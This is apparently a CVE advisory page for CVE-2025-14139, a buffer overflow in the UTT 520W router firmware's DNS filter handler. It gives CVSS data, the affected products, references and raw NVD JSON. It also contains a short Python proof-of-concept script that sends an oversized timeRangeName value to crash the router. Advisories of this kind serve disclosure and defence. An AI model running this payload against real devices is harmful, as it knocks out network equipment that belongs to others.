CVE-2025-14139

Description

A security vulnerability has been detected in UTT 进取 520W 1.7.7-180627. Impacted is the function strcpy of the file /goform/formConfigDnsFilterGlobal. Such manipulation of the argument timeRangeName leads to buffer overflow. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

5.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:utt:520w_firmware:1.7.7-180627:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:utt:520w:-:*:*:*:*:*:*:* - NOT VULNERABLE

UTT 进取 520W 固件版本 1.7.7-180627

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-14139 PoC - UTT 进取 520W Buffer Overflow
# Target: /goform/formConfigDnsFilterGlobal
# Vulnerability: strcpy overflow via timeRangeName parameter

import requests
import sys

target_host = "http://192.168.1.1"  # Default UTT router IP
target_path = "/goform/formConfigDnsFilterGlobal"

# Generate payload with oversized timeRangeName (1024 bytes for overflow)
payload_size = 1024
overflow_payload = "A" * payload_size

def exploit_cve_2025_14139():
    """
    Exploit for CVE-2025-14139: Buffer overflow in UTT 进取 520W
    via timeRangeName parameter in /goform/formConfigDnsFilterGlobal
    """
    url = f"{target_host}{target_path}"
    
    # Construct the exploit payload
    data = {
        "timeRangeName": overflow_payload,
        "action": "add",
        "enable": "1"
    }
    
    try:
        print(f"[*] Sending exploit payload to {url}")
        print(f"[*] Payload size: {len(overflow_payload)} bytes")
        
        # Send the malicious request
        response = requests.post(url, data=data, timeout=10)
        
        print(f"[*] Response status: {response.status_code}")
        print(f"[*] Response length: {len(response.text)}")
        
        return response
        
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target_host = sys.argv[1]
    
    print("=" * 60)
    print("CVE-2025-14139 Exploit - UTT 进取 520W Buffer Overflow")
    print("=" * 60)
    
    result = exploit_cve_2025_14139()
    
    if result:
        print("[+] Exploit sent successfully")
    else:
        print("[-] Exploit failed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14139
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14139
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14139/
[4] VulDB https://vuldb.com/cve/CVE-2025-14139
[5] https://github.com/cymiao1978/cve/blob/main/new/11.md
[6] https://github.com/cymiao1978/cve/blob/main/new/11.md#poc
[7] https://vuldb.com/?ctiid.334527
[8] https://vuldb.com/?id.334527
[9] https://vuldb.com/?submit.698520
[10] https://github.com/cymiao1978/cve/blob/main/new/11.md
[11] https://github.com/cymiao1978/cve/blob/main/new/11.md#poc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14139", "sourceIdentifier": "[email protected]", "published": "2025-12-06T15:15:48.753", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in UTT 进取 520W 1.7.7-180627. Impacted is the function strcpy of the file /goform/formConfigDnsFilterGlobal. Such manipulation of the argument timeRangeName leads to buffer overflow. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:A/AC:L/Au:S/C:N/I:N/A:C", "baseScore": 5.5, "accessVector": "ADJACENT_NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 5.1, "impactScore": 6.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:520w_firmware:1.7.7-180627:*:*:*:*:*:*:*", "matchCriteriaId": "114E0E55-A7EE-4B95-8584-41F4FCED4B64"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:520w:-:*:*:*:*:*:*:*", "matchCriteriaId": "F7553AA8-68FB-4F4C-9546-F9BBB5DF17CB"}]}]}], "references": [{"url": "https://github.com/cymiao1978/cve/blob/main/new/11.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/cymiao1978/cve/blob/main/new/11.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.334527", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.334527", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.698520", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/cymiao1978/cve/blob/main/new/11.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/cymiao1978/cve/blob/main/new/11.md#poc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}